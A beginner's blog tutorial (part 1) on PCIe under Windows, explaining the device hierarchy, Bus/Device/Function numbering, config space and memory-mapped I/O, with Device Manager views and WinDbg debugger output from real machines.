Normal view

There are new articles available, click to refresh the page.
Before yesterdayReversing Engineering for the Soul

A Practical Tutorial on PCIe for Total Beginners on Windows (Part 1)

14 February 2023 at 00:00

Foreword about the series

Hello! I have been speaking to some friends and coworkers lately interested in learning more about PCIe but feeling intimidated by the complexity or the lack of simple resources for beginners. I have been working with PCIe a lot lately and felt like it might be worth sharing some of my experience in the form of a blog post.

This post is intended to be utilized by those with a background with computer systems who like to get their hands dirty. It is also intended for total beginners to PCIe or someone who is aware of the general concepts but is having trouble linking the concepts together.

First thing’s first: Do not be intimidated. There are a lot of acronyms and confusing concepts that will be made simple as you “get it”. Take things a step at the time and don’t be afraid to ask questions! (If you want to ask me questions, consider pinging me @Gbps in the #hardware channel in the Reverse Engineering Discord)

I intend to do a couple of things with this series:

  • Break PCIe down into what I feel is most important from the software side to learn and build a good baseline mental model for modern PC/server systems.
  • Show practical examples of investigating PCIe hierarchies and devices on Windows using various tools (usually WinDbg).
  • I will hand wave or omit some specific details intentionally to avoid confusion. Terminology here may be incorrect, even the information itself might be technically incorrect. But the purpose of this is to learn the system as a whole, not the specific details of the specification. PCIe is complex, and it is not worth getting caught up in too many details and corner-cases when building a beginner’s understanding.
  • Hopefully demystify this technology by relating it back to concepts you are already familiar with. PCIe did not re-invent the wheel, and you probably understand a lot more about it already than you realize by understanding technologies similar to it.

I do not intended to do the following things with this series:

  • Go into detail about legacy PCI or PCI-X. This technology is, in general, not important other than for historical interest.
  • Show you how to write a device driver for a PCIe device. This is very OS specific and is much higher level than what is going to be talked about here.
  • Go into detail about the hardware behind PCIe. More than half of the specification is spent on this subject and contains some of the most cutting edge techology in the world for high speed data transfer. I do not deal with this side of the house, however I might in the future speak about building PCIe devices with FPGAs (which I have done before).
  • Help you cheat in video games with PCIe. Yes, it exists. No, I will not help. Consider playing the game normally instead.

This is not a comprehensive look into the technology or the protocol. For a truly exhaustive look, you should refer to the ever elusive PCI-SIG PCI Express Base Specification. This is the specification by which all PCIe code is implemented based on. Currently, as of writing, we are on version 6.0 of this specification, but anything from 3.0 onwards is perfectly relevant for modern PCIe. How you acquire this expensive specification is an exercise to the reader.

Without further ado, let’s talk about PCIe starting from square one.

NOTE: I will sometimes switch back and forth between “PCI” and “PCIe” when describing the technology as a force of habit. Everything in this series is about PCIe unless otherwise noted.

What is PCIe and why should I care?

PCIe stands for Peripheral Component Interconnect Express. It was introduced first in 2003 and evolved from the older PCI and PCI-X specifications that grew in popularity in the early PC era (with the added “e” for Express to differentiate it).

Most people who work with computers recognize it as the PCIe slot on their motherboard where they plug in graphics cards or adapter cards, but PCIe is way more than just these few extension ports. PCIe is the foundation of how a modern CPU speaks to practically every device connected to the system.

Since its introduction, PCIe’s popularity has skyrocketted as a near universal standard for short-distance high-speed data transmission. Nearly all M.2 SSDs use NVMe over PCIe as their transport protocol. Thunderbolt 3 brought the ability to dynamically hotplug PCIe devices directly to the system using an external cord (enabling technology such as docking stations and eGPUs). Building off of that, USB4 is in the process of extending Thunderbolt 3 to enable this PCIe routing technology to the open USB specification. New transports such as CXL for datacenter servers utilize PCIe as the base specification and extend their special sauce on top of it.

Even if the device being communicated with doesn’t natively use PCIe as its physical layer protocol, the system must still use PCI’s software interface to communicate. This is because the system uses adapters (often called Host Controllers) which are PCI devices that facilitate the translation from PCI requests from the CPU into whatever protocol or bus the Host Controller supports. For example, all USB 3.1 on this test machine utilizes the USB XHCI protocol, which is a communication protocol that bridges PCIe to USB through a PCI driver communicating with the USB Host Controller.

image-20230212174259430

A USB 3.1 Host Controller. All USB on this system will happen through this controller, which is on the PCI bus.

Needless to say, PCI is running the show everywhere these day and has been fully adopted by all parts of the computing world. It is therefore important that we develop a good understanding of this technology to build a better understanding of modern computing.

Investigating a PCIe Hierarchy - A packet switched network

The most major change from legacy PCI to PCIe was the change from a true bus topology to a point-to-point link. You can think of this as the evolution of Ethernet hubs to Ethernet switches of today. Each link is a separate point-to-point link that is routed just like an Ethernet cord on a packet-switched Ethernet network. This means that PCIe is not actually a “bus protocol”, despite the word “bus” confusingly used all over the literature and technical specifications. One must carefully learn that this word “bus” does not mean multiple PCIe devices are talking on the same physical link. Packets (known as TLPs) travel across each individual link and the switching devices in the hierarchy deliver the packet to the proper ports using routing information within the packet.

Before we go into the technical details of PCIe, first we need to talk about how the whole system is laid out. The first way we will be investigating the hierarchy of PCIe is through the Windows Device Manager. Most people who are familiar with Windows have used it before, but not many people know about the very handy feature found in View > Devices by Connection.

image-20230212175544044

By selecting this view, we get to see the full topology of the system from the root PNP (Plug-N-Play) node. The PNP root node is the root of the tree of all devices on Windows, regardless of what bus or protocol they use. Every device, whether virtual or physical, is enumerated and placed onto this PNP tree. We can view the layout of this tree utilizing this view of the Device Manager.

In particular, we are looking to find the layout of the PCI devices on the system. That way, we can begin to build a visual model of what the PCI tree looks like on this machine. To do that, we need to locate the root of the PCI tree: the Root Complex. The Root Complex (abbreviated RC) is the owner of all things PCIe on the system. It is located physically on the CPU silicon and it is responsible for acting as the host that all PCIe devices receive and send packets with. It can be thought of as the bridge between software (the instructions executing on your machine) and hardware (the outside world of PCIe and RAM).

On this system, it is found in the PNP hierarchy here:

image-20230212175850022

NOTE: You might be asking now “if PCI runs the show, why isn’t the PCI Root Complex at the top of the tree?” The answer to that is due to the fact that the PCIe bus is not the initial layout of the system presented by firmware during boot. Instead, ACPI (Advanced Configuration & Power Interface) is what describes the existence of PCIe to the OS. While you would never see it in a PC, it is possible to describe a system with no PCI bus and everything being presented purely by ACPI. We will talk more about ACPI later, but for now do not worry about this too much, just know that ACPI is how firmware tells us where the Root Complex is located, which then helps the OS enumerate PCI devices in the tree.

So now we know that the Root Complex is the top of the PCIe tree, now let’s take a look at what all is underneath it:

image-20230212181639331

Unsurprisingly, there are many devices on this PCI bus. Here we can see all sorts of controllers responsible for Audio, Integrated Graphics, USB, Serial, and SATA. In addition, we see a few of these devices known as PCI Express Root Port. A Root Port is a port on the Root Complex where another PCIe Endpoint (aka a physical ‘device’) or Switch (aka a ‘router’) can be connected to. For PCI specification sake, you will hear Endpoints referred to as Type 0 devices, and Switch (or a Bridge) referred to as Type 1 devices, due to the fact that one is configured as a device to talk to and the other is configured as a device to route packets. An RC will have as many root ports as it physically supports. That is, as many as can be connected to the CPU silicon. Some root ports on a CPU might be routed directly to a physical PCIe slot, while others might be routed to other types of slots like an NVMe slot. It might also be routed to another PCIe switching device, which can route packets to multiple ports and therefore multiple Endpoints at once.

I will keep bringing this comparison back up, but I feel it is important– if you already understand Ethernet switches, you already understand PCIe switches. You can imagine that these root ports are like Ethernet ports on your desktop computer. You could connect these directly to another device (such as a camera) or you could connect these to a switch like your home router/modem, which will switch packets to expose more connections with further devices and machines to talk to. In this case, the ethernet cords are instead copper wire connecting one PCIe port to another PCIe port, thereby making it “point-to-point”.

With this in mind, let’s start diagraming this hierarchy (partially) so we’re seeing it all laid out visually:

image-20230212183438211

In PCI, all “busses” on the system are identified with a number from 0 to 255 (inclusive). In addition, all devices are identified with a “device id” and a “function id”. This is often seen described as Bus/Device/Function, or simply BDF. In more correct specification terms, this would be known as a RID (Requestor ID). To reduce confusion, I will refer to it as a BDF. BDF is important because it specifically tells us where in the PCIe hierarchy the device is located so we can communicate with it.

Because these are all on the top level of the hierarchy, we will give this “bus” a numerical identifier, it will be “Bus 0” or the Root Bus. We can verify that all of these devices are Bus 0 devices by right clicking a top level device and selecting Properties and looking at Location:

image-20230212184849503

For this integrated graphics device, it is located with a BDF of 0:2.0. It is on Bus 0 (the Root Bus), a device id of 2, and a function id of 0. A “device” in this case represents a physical device, such as a graphics card. A “function” is a distinct capability that the physical device exposes to the system. It can, for all intents and purposes, be thought of as a separate entity. A device which exposes more than one function is aptly known as a Multi-Function Device (MFD). That means it exposes two or more PCI connections to the system while only physically being one device. We will look at an example of a real MFD soon.

An astute reader will notice that already we have already broken the “rule” I noted above: There are many devices connected to this singular Bus 0. This is the first exception to the “point-to-point” rule in PCIe and is only allowed in this case because Bus 0 is physically located on the silicon of the CPU. That is, there are no electrical traces between these devices, it is an imaginary connection. All of these devices exist inside the CPU package and routed using the extremely high speed electrical interconnects within it. These processor interconnects use an internal protocol that is specific to the vendor of the CPU and is not publicly documented, however we still communicate with it in the ‘language’ of PCIe. These endpoints (labelled in green), due to their special nature, will be given a special name: Root Complex Integrated Endpoints (RCIE), because they are integrated directly on the Root Complex.

This shouldn’t come as a surprise, you would expect that devices such as the integrated UHD graphics will be physically located on the CPU (as it is part of the specifications of the CPU). But we can learn about some more interesting topology of the system by observing other RCIEs, such as the fact that the RAM controller is also present here (the silicon which talks to the DRAM DIMMs of memory) and the USB controller (the silicon which talks to external USB devices). This is why certain CPUs only support certain kinds of RAM and USB specifications– because the devices which communicate are physically located on the CPU and only support the specification they were physically created to support.

UPDATE: This statement is incorrect. Some IO controllers can still be found on a discrete chip called the PCH (Intel) or also known as the chipset (AMD) which is nearby the CPU and has a high speed link that makes it seem like it is integrated into the CPU silicon. The above sentence incorrectly says that you can find the USB controller on the physical CPU, where it is more likely to be on the “chipset”. However, the memory controller that talks to RAM is found on the CPU die for speed purposes.

This diagram is a minimized version of the first level of the hierarchy, but now let’s build the rest of the hierarchy by expanding the rest of the Root Ports in the device manager.

image-20230212185846778

And here’s what the filled in graph looks like:

image-20230212190635100

Note: I have marked the BDF of the UHD Graphics device and Bus 0.

These root ports are physically located on the CPU, but the devices attached to it are not. There are 3 devices connected to the external PCIe slots on this machine, a NVIDIA Quadro P400 graphics card and two NVMe drives. By going to the properties of each of these in Device Manager, we can pull and update their BDF information in the visual:

image-20230212191110293

Underneath each of the root ports, we can see a device is physically connected. But, we can also see we have been exposed a new Bus under each. The Root Port has acted as a Bridge, it has bridged us from Bus 0 into a new bus, therefore the new bus must be assigned a new numerical ID and all of the devices/functions underneath that port will inherit that new bus number. This is the same logic utilized by the OS/Firmware during bus enumeration during boot: All bridges and switches expose a new bus which must be assigned a new bus ID number.

In this case, we can also see a good example of a Multi-Function Device. The Quadro P400 graphics card is acting as a MFD with two functions. The first function is 0 (BDF 01:00.0) and is the graphics card device itself. The second function is 1 (BDF 01:00.1) and it is the audio controller that allows audio to be played out of the ports such as HDMI. These two functions are distinct– they serve entirely different purposes and have separate drivers and configuration associated with them, but they are still implemented by the same physical device, which is device 0, and is located on the same bus, which is bus 1. This is consistent with the point-to-point rule of PCIe, only one physical device can be connected to a link, therefore only one physical device can exist on the bus (other than the exception, bus 0).

Exploring PCIe hierarchy and devices from WinDbg

So far we’ve seen a standard PCI bus hierarchy by using Device Manager’s “View by Connection” functionality. There is another more detailed way to investigate a PCIe hierarchy: using the trusty kernel debug extensions provided by WinDbg.

NOTE: It is assumed that you understand how to set up a kernel debugger on a machine to continue following along. You can also use LiveKD for most exercises. If you do not, please refer to the guide provided by Microsoft: Set up KDNET

I have connected to a new test machine different than the one used above. We will walk through the process of graphing the hierarchy of this machine using the output of the debugger. We will also learn how to investigate information about the device through its configuration memory.

Once dropped into a debugger, we will start by using the !pcitree command. This will dump a textual tree diagram of the PCI devices enumerated on the system.

8: kd> !pcitree
Bus 0x0 (FDO Ext ffffdc89b9f75920)
  (d=0,  f=0) 80866f00 devext 0xffffdc89b0759270 devstack 0xffffdc89b0759120 0600 Bridge/HOST to PCI
  (d=1,  f=0) 80866f02 devext 0xffffdc89ba0c74c0 devstack 0xffffdc89ba0c7370 0604 Bridge/PCI to PCI
  Bus 0x1 (FDO Ext ffffdc89ba0aa190)
    No devices have been enumerated on this bus.
  (d=2,  f=0) 80866f04 devext 0xffffdc89ba0c94c0 devstack 0xffffdc89ba0c9370 0604 Bridge/PCI to PCI
  Bus 0x2 (FDO Ext ffffdc89ba0a8190)
    (d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA
    (d=0,  f=1) 10de0fbc devext 0xffffdc89ba051270 devstack 0xffffdc89ba051120 0403 Multimedia Device/Unknown Sub Class
  (d=3,  f=0) 80866f08 devext 0xffffdc89ba0cb4c0 devstack 0xffffdc89ba0cb370 0604 Bridge/PCI to PCI
  Bus 0x3 (FDO Ext ffffdc89ba08f190)
    No devices have been enumerated on this bus.
  (d=5,  f=0) 80866f28 devext 0xffffdc89ba0cd4c0 devstack 0xffffdc89ba0cd370 0880 Base System Device/'Other' base system device
  (d=5,  f=1) 80866f29 devext 0xffffdc89ba0cf4c0 devstack 0xffffdc89ba0cf370 0880 Base System Device/'Other' base system device
  (d=5,  f=2) 80866f2a devext 0xffffdc89ba0d14c0 devstack 0xffffdc89ba0d1370 0880 Base System Device/'Other' base system device
  (d=5,  f=4) 80866f2c devext 0xffffdc89ba0d34c0 devstack 0xffffdc89ba0d3370 0800 Base System Device/Interrupt Controller
  (d=11, f=0) 80868d7c devext 0xffffdc89ba0d84c0 devstack 0xffffdc89ba0d8370 ff00 (Explicitly) Undefined/Unknown Sub Class
  (d=11, f=4) 80868d62 devext 0xffffdc89ba0da4c0 devstack 0xffffdc89ba0da370 0106 Mass Storage Controller/Unknown Sub Class
  (d=14, f=0) 80868d31 devext 0xffffdc89ba0dc4c0 devstack 0xffffdc89ba0dc370 0c03 Serial Bus Controller/USB
  (d=16, f=0) 80868d3a devext 0xffffdc89ba0de4c0 devstack 0xffffdc89ba0de370 0780 Simple Serial Communications Controller/'Other'
  (d=16, f=3) 80868d3d devext 0xffffdc89ba0e04c0 devstack 0xffffdc89ba0e0370 0700 Simple Serial Communications Controller/Serial Port
  (d=19, f=0) 808615a0 devext 0xffffdc89ba0e24c0 devstack 0xffffdc89ba0e2370 0200 Network Controller/Ethernet
  (d=1a, f=0) 80868d2d devext 0xffffdc89ba0e44c0 devstack 0xffffdc89ba0e4370 0c03 Serial Bus Controller/USB
  (d=1b, f=0) 80868d20 devext 0xffffdc89ba0254c0 devstack 0xffffdc89ba025370 0403 Multimedia Device/Unknown Sub Class
  (d=1c, f=0) 80868d10 devext 0xffffdc89ba0274c0 devstack 0xffffdc89ba027370 0604 Bridge/PCI to PCI
  Bus 0x4 (FDO Ext ffffdc89ba0a9190)
    No devices have been enumerated on this bus.
  (d=1c, f=1) 80868d12 devext 0xffffdc89ba02c4c0 devstack 0xffffdc89ba02c370 0604 Bridge/PCI to PCI
  Bus 0x5 (FDO Ext ffffdc89b9fe6190)
    No devices have been enumerated on this bus.
  (d=1c, f=3) 80868d16 devext 0xffffdc89ba02e4c0 devstack 0xffffdc89ba02e370 0604 Bridge/PCI to PCI
  Bus 0x6 (FDO Ext ffffdc89ba0a7190)
    (d=0,  f=0) 12838893 devext 0xffffdc89ba062270 devstack 0xffffdc89ba062120 0604 Bridge/PCI to PCI
    Bus 0x7 (FDO Ext ffffdc89ba064250)
      No devices have been enumerated on this bus.
  (d=1c, f=4) 80868d18 devext 0xffffdc89ba0304c0 devstack 0xffffdc89ba030370 0604 Bridge/PCI to PCI
  Bus 0x8 (FDO Ext ffffdc89ba0b2190)
    No devices have been enumerated on this bus.
  (d=1d, f=0) 80868d26 devext 0xffffdc89ba0364c0 devstack 0xffffdc89ba036370 0c03 Serial Bus Controller/USB
  (d=1f, f=0) 80868d44 devext 0xffffdc89ba0384c0 devstack 0xffffdc89ba038370 0601 Bridge/PCI to ISA
  (d=1f, f=2) 80868d02 devext 0xffffdc89ba03a4c0 devstack 0xffffdc89ba03a370 0106 Mass Storage Controller/Unknown Sub Class
  (d=1f, f=3) 80868d22 devext 0xffffdc89ba03c4c0 devstack 0xffffdc89ba03c370 0c05 Serial Bus Controller/Unknown Sub Class

NOTE: If you have an error Error retrieving address of PciFdoExtensionListHead, make sure your symbols are set up correctly and run .reload pci.sys to reload PCI’s symbols.

When presented with this output, it might be difficult to visually see the “tree” due to the way the whitespace is formatted. The way to interpret this output is to look at the indentation of the Bus 0x text. Anything indented one set of spaces further than the Bus 0x line is a device on that bus. We can see there are also other Bus 0x lines directly underneath a device. That means that the device above the Bus 0x line is exposing a new bus to us, and the bus number is given there.

Let’s take look at a specific portion of this output:

Bus 0x0 (FDO Ext ffffdc89b9f75920)
  (d=0,  f=0) 80866f00 devext 0xffffdc89b0759270 devstack 0xffffdc89b0759120 0600 Bridge/HOST to PCI
  (d=1,  f=0) 80866f02 devext 0xffffdc89ba0c74c0 devstack 0xffffdc89ba0c7370 0604 Bridge/PCI to PCI
  Bus 0x1 (FDO Ext ffffdc89ba0aa190)
    No devices have been enumerated on this bus.
  (d=2,  f=0) 80866f04 devext 0xffffdc89ba0c94c0 devstack 0xffffdc89ba0c9370 0604 Bridge/PCI to PCI
  Bus 0x2 (FDO Ext ffffdc89ba0a8190)
    (d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA
    (d=0,  f=1) 10de0fbc devext 0xffffdc89ba051270 devstack 0xffffdc89ba051120 0403 Multimedia Device/Unknown Sub Class
  (d=3,  f=0) 80866f08 devext 0xffffdc89ba0cb4c0 devstack 0xffffdc89ba0cb370 0604 Bridge/PCI to PCI
  Bus 0x3 (FDO Ext ffffdc89ba08f190)
    No devices have been enumerated on this bus.

In this output, we can see the BDF displayed of each device. We can also see a set of Root Ports that exist on Bus 0 that do not have any devices enumerated underneath, which means that the slots have not been connected to any devices.

It should be easier to see the tree structure here, but let’s graph it out anyways:

image-20230213124016347

NOTE: It is just a coincidence that the bus numbers happen to match up with the device numbers of the Bridge/PCI to PCI ports.

As you now know, the devices labelled as Bridge/PCI to PCI are in fact Root Ports, and the device on Bus 2 is in fact a Multi-Function Device. Unlike the device manager, we don’t see the true name of the device from !pcitree. Instead, we are just given a generic PCI name for what “type” of the device advertises itself as. This is because Device Manager is reading the name of the device from the driver and not directly from PCI.

To see more about what this Display Controller device is, we can use the command !devext [pointer], where [pointer] is the value directly after the word devext in the layout. In this case, it is:

(d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA
!devext 0xffffdc89ba04f270

From here, we will get a printout of a summary of this PCI device as seen from the PCI bus driver in Windows, pci.sys:

8: kd> !devext 0xffffdc89ba04f270
PDO Extension, Bus 0x2, Device 0, Function 0.
  DevObj 0xffffdc89ba04f120  Parent FDO DevExt 0xffffdc89ba0a8190
  Device State = PciStarted
  Vendor ID 10de (NVIDIA CORPORATION)  Device ID 13BB
  Subsystem Vendor ID 103c (HEWLETT-PACKARD COMPANY)  Subsystem ID 1098
  Header Type 0, Class Base/Sub 03/00  (Display Controller/VGA)
  Programming Interface: 00, Revision: a2, IntPin: 01, RawLine 00
  Possible Decodes ((cmd & 7) = 7): BMI
  Capabilities: Ptr=60, power msi express 
  Express capabilities: (BIOS controlled) 
  Logical Device Power State: D0
  Device Wake Level:          Unspecified
  WaitWakeIrp:                <none>
  Requirements:     Alignment Length    Minimum          Maximum
    BAR0    Mem:    01000000  01000000  0000000000000000 00000000ffffffff
    BAR1    Mem:    10000000  10000000  0000000000000000 ffffffffffffffff
    BAR3    Mem:    02000000  02000000  0000000000000000 ffffffffffffffff
    BAR5     Io:    00000080  00000080  0000000000000000 00000000ffffffff
      ROM BAR:      00080000  00080000  0000000000000000 00000000ffffffff
    VF BAR0 Mem:    00080000  00080000  0000000000000000 00000000ffffffff
  Resources:        Start            Length
    BAR0    Mem:    00000000f2000000 01000000
    BAR1    Mem:    00000000e0000000 10000000
    BAR3    Mem:    00000000f0000000 02000000
    BAR5     Io:    0000000000001000 00000080
  Interrupt Requirement:
    Line Based - Min Vector = 0x0, Max Vector = 0xffffffff
    Message Based: Type - Msi, 0x1 messages requested
  Interrupt Resource:    Type - MSI, 0x1 Messages Granted

There is quite a lot of information here that the kernel knows about this device. This information was retrieved through Configuration Space (abbrev. “config space”), a section of memory on the system which allows the kernel to enumerate, query info, and setup PCI devices in a standardized way. The software reads memory from the device to query information such as the Vendor ID, and the device (if it is powered on) responds back with that information. In the next section, I will discuss more about how this actually takes place, but know that the information queried here was produced from config space.

So let’s break down the important stuff:

  • DevObj: The pointer to the nt!_DEVICE_OBJECT structure which represents the physical device in the kernel.
  • Vendor ID: A 16-bit id number which is registered to a particular device manufacturer. This value is standardized, and new vendors must be assigned a unique ID by the PCI-SIG so they do not overlap. In this case, we see this is a NVIDIA graphics card.
  • Device ID: A 16-bit id number for the particular chip doing PCIe. Similar idea in that a company must request a unique ID for their chip so it doesn’t conflict with any others.
  • Subsystem Vendor ID: The vendor id of the board the chip sits on. In this case, “HP” is the producer of the graphics card, and “NVIDIA” designed the graphic chip.
  • Subsystem Device ID: The device id of the board the chip sits on.
  • Logical Device Power State: The power state of this device. There are two major power states in PCI, D0 = Device is powered on, D3 = Device is in a low-power state, or completely off.
  • Requirements: The memory requirements the device is asking the OS to allocate for it. More on this later.
  • Resources: The memory resources assigned to this device by the OS. This device is powered on and started already, so it already has its resources assigned.
  • Interrupt Requirement/Resource: Same as above, except for interrupts.

To actually get the full information about this device, we can use the fantastic tool at PCI Lookup to query the public information about PCI devices registered with the PCI-SIG. Let’s put the information about the device and vendor ID into the box:

image-20230213142628075

And when we search, we get back this:

image-20230213142645087

Which tells us this device is a Quadro K620 graphics card created by NVIDIA. The subsystem ID tells us that this particular card PCB was produced by HP, which was licensed out by NVIDIA.

What we saw in !devext is a good overview of what pci.sys specifically cares about showing us in the summary, but it only scratches the surface of all of the information in config space. To dump all of the information in configuration space, we can use the extension !pci 100 B D F where BDF is the BDF of our device in question. 100 is a set of flags that specifies that we want to dump all information about the device. The information displayed will be laid out in the order that it exists in the config space of the device. Prefixing each section is an offset, such as 02 for device id. This specifies the offset into config space that this value was read from. These offsets are detailed in the PCI specification and do not change between PCI versions for backwards compatibility purposes.

8: kd> !pci 100 2 0 0

PCI Configuration Space (Segment:0000 Bus:02 Device:00 Function:00)
Common Header:
    00: VendorID       10de Nvidia Corporation
    02: DeviceID       13bb
    04: Command        0507 IOSpaceEn MemSpaceEn BusInitiate SERREn InterruptDis 
    06: Status         0010 CapList 
    08: RevisionID     a2
    09: ProgIF         00 VGA
    0a: SubClass       00 VGA Compatible Controller
    0b: BaseClass      03 Display Controller
    0c: CacheLineSize  0000
    0d: LatencyTimer   00
    0e: HeaderType     80
    0f: BIST           00
    10: BAR0           f2000000
    14: BAR1           e000000c
    18: BAR2           00000000
    1c: BAR3           f000000c
    20: BAR4           00000000
    24: BAR5           00001001
    28: CBCISPtr       00000000
    2c: SubSysVenID    103c
    2e: SubSysID       1098
    30: ROMBAR         00000000
    34: CapPtr         60
    3c: IntLine        00
    3d: IntPin         01
    3e: MinGnt         00
    3f: MaxLat         00
Device Private:
    40: 1098103c 00000000 00000000 00000000
    50: 00000000 00000001 0023d6ce 00000000
    60: 00036801 00000008 00817805 fee001f8
    70: 00000000 00000000 00120010 012c8de1
    80: 00003930 00453d02 11010140 00000000
    90: 00000000 00000000 00000000 00040013
    a0: 00000000 00000006 00000002 00000000
    b0: 00000000 01140009 00000000 00000000
    c0: 00000000 00000000 00000000 00000000
    d0: 00000000 00000000 00000000 00000000
    e0: 00000000 00000000 00000000 00000000
    f0: 00000000 00000000 00000000 00000000
Capabilities:
    60: CapID          01 PwrMgmt Capability
    61: NextPtr        68
    62: PwrMgmtCap     0003 Version=3
    64: PwrMgmtCtrl    0008 DataScale:0 DataSel:0 D0 

    68: CapID          05 MSI Capability
    69: NextPtr        78
    6a: MsgCtrl        64BitCapable MSIEnable MultipleMsgEnable:0 (0x1) MultipleMsgCapable:0 (0x1)
    6c: MsgAddrLow     fee001f8
    70: MsgAddrHi      0
    74: MsgData        0

    78: CapID          10 PCI Express Capability
    79: NextPtr        00
    7a: Express Caps   0012 (ver. 2) Type:LegacyEP
    7c: Device Caps    012c8de1
    80: Device Control 3930 bcre/flr MRR:1K NS ap pf ET MP:256 RO ur fe nf ce
    82: Device Status  0000 tp ap ur fe nf ce
    84: Link Caps      00453d02
    88: Link Control   0140 es CC rl ld RCB:64 ASPM:None 
    8a: Link Status    1101 SCC lt lte NLW:x16 LS:2.5 
    9c: DeviceCaps2    00040013 CTR:3 CTDIS arifwd aor aoc32 aoc64 cas128 noro ltr TPH:0 OBFF:1 extfmt eetlp EETLPMax:0
    a0: DeviceControl2 0000 CTVal:0 ctdis arifwd aor aoeb idoreq idocom ltr OBFF:0 eetlp

Enhanced Capabilities:
    100: CapID         0002 Virtual Channel Capability
         Version       1
         NextPtr       258
    0104: Port VC Capability 1        00000000
    0108: Port VC Capability 2        00000000
    010c: Port VC Control             0000
    010e: Port VC Status              0000
    0110: VC Resource[0] Cap          00000000
    0114: VC Resource[0] Control      800000ff
    011a: VC Resource[0] Status       0000

    258: CapID         001e L1 PM SS Capability
         Version       1
         NextPtr       128
    25c: Capabilities  0028ff1f  PTPOV:5 PTPOS:0 PCMRT:255 L1PMS ASPML11 ASPML12 PCIPML11 PCIPML12
    260: Control1      00000000  LTRL12TS:0 LTRL12TV:0 CMRT:0 aspml11 aspml12 pcipml11 pcipml12
    264: Control2      00000028  TPOV:5 TPOS:0

    128: CapID         0004 Power Budgeting Capability
         Version       1
         NextPtr       600

    600: CapID         000b Vendor Specific Capability
         Version       1
         NextPtr       000
         Vendor Specific ID 0001 - Ver. 1  Length: 024

The nice thing about this view is that we can see detailed information about the Capabilities section of config space. Capabilities is a set of structures within the config space that describes exactly what features device is capable of. Capabilities includes information such as link speed and what kinds of interrupts the device supports. Any new features added to the PCI specification will be advertised through these structures, and the structures form a linked list of capabilities in config space that can be iterated through to discover all capabilities of the device. Not all of these capabilities are relevant to the OS, some are relevant only to aspects of hardware not covered by this post. For now, I won’t go into any further details of the capabilities of this device.

PCIe: It’s all about memory

So now that we’ve investigated a few devices and the hierarchy of a PCI bus, let’s talk about how the communication with software and PCI devices actually works. When I was first learning about PCI, I had a lot of trouble understanding what exactly was happening when software interfaces with a PCI device. Because the entire transaction is abstracted away from you as the software developer, it’s hard to build the mental model of what’s going on by just poking at PCI memory from a debugging tool. Hopefully this writeup will provide a better overview than what I was able to get when I was first starting out.

First off I will make a bold statement: All modern PCIe communication is done through memory reads and writes. If you understand how memory in PCIe works, you will understand how PCIe software communication works. (Yes, there are other legacy ways to communicate on certain platforms, but we will not discuss those because they are deprecated.)

Now, let’s talk about different types of memory on a modern platform. The CPU of your OS after very early in boot will be using virtual memory. That is, the memory addresses seen by your CPU are the view of memory mapped to the physical memory world.

For our purposes, there are two types of physical memory on a system:

  • RAM - Addresses that, when read or written to, is stored and retrieved from the DRAM DIMMs on your machine. This is what most people think of when they think “memory”.
  • Device Memory - Addresses that, when read or written to, talks to a device on the system. The keyword here is talks. It does not store memory on the device, it does not retrieve memory on the device (although the device might be able to both). The address you might be talking to might not even be memory at all, but a more ethereal “device register” that configures the inner workings of the device. It is up to the device what happens with this kind of access. All you are doing is communicating with a device. You will typically see this referred to as MMIO, which stands for Memory-Mapped I/O.

NOTE: Device memory for PCI will always read “all 1s” or “all FFs” whenever a device does not respond to the address accessed in a device memory region. This is a handy way to know when a device is actually responding or not. If you see all FFs, you know you’re reading invalid device addresses.

It is a misunderstanding of beginners that all physical memory is RAM. When software talks to a PCI device in the PCI region, it is not reading and writing from RAM. The device instead is receiving a packet (a TLP, Transmission-Layer Packet) from the Root Complex that is automatically generated for you by your CPU immediately when the address inside the PCI region is read/written. You do not create these packets in software, and all of these packets are generated completely behind the scenes as soon as this memory is accessed. In software, you cannot even see or capture these packets, instead requiring a special hardware testing device to intercept and view the packets being sent. More on this later.

If it helps, think of physical memory instead as a mapping of devices. RAM is a device which is mapped into physical memory for you. PCI also has regions mapped automatically for you. Though they are distinct and act very differently, they look the same to software.

In the following diagram, we can see how a typical system is mapping virtual memory to physical memory. Note that there are two regions of RAM and two regions of PCI memory. This is because certain older PCI devices can only address 32-bits of memory. Therefore, some RAM is moved up above 4GB if your RAM does not fit within the window of addresses under 4GB. Since your processor supports 64-bit addresses, this is not an issue. Additionally, a second window is created above the 4GB line for PCI devices which do support 64-bit addresses. Because the 4GB region can be very constrained, it is best for devices to move as much memory above 4GB as to not clutter the space below.

image-20230213150427013

A very simplified view of how ranges of virtual addresses could be mapped to physical addresses. This ignores a large number of "special" regions in physical memory, but showcases how RAM and device memory are not the same.

Let’s talk first about the type of memory we’ve already seen: configuration space.

Configuration space is located in a section of memory called ECAM which stands for Extended Configuration Access Management. Because it is a form of device memory, in order to access this memory from the kernel (which uses virtual memory), the kernel must ask the memory manager to map this physical memory into a virtual address. Then, software instructions can use the virtual address of the mapping to read and write from physical addresses. On Windows, locating and mapping this memory is handled partially by pci.sys, partially by acpi.sys, and partially by the kernel (specifically the HAL).

NOTE: Typically the way device memory is mapped in Windows is through MmMapIoSpaceEx, which is an API drivers can use to map physical device memory. However, in order to do configuration space accesses, software must use HalGetBusDataByOffset and HalSetBusDataByOffset to ensure that the internal state of pci.sys is kept in synchronization with the configuration space reads/writes you are doing. If you try to map and change configuration space yourself, you might desync state from pci.sys and cause a BSOD.

NOTE: Where in physical memory the ECAM/PCI regions are located is platform dependent. The firmware at boot time will assign all special regions of physical memory of the system. The firmware then advertises the location of these regions to the OS during boot time. On x86-64 systems, the ECAM region will be communicated from firmware through ACPI using a table (a structure) called MCFG. Is it not important for now to know what specific protocol is used to retrieve this info, just understand that the OS retrieves the addresses of these regions from the firmware, which decided where to put them.

So in order to do a configuration space access, the kernel must map configuration space (ECAM) to virtual memory. This is what such a thing would look like:

image-20230213153547802

A mapping of ECAM to virtual memory. Horribly not to scale.

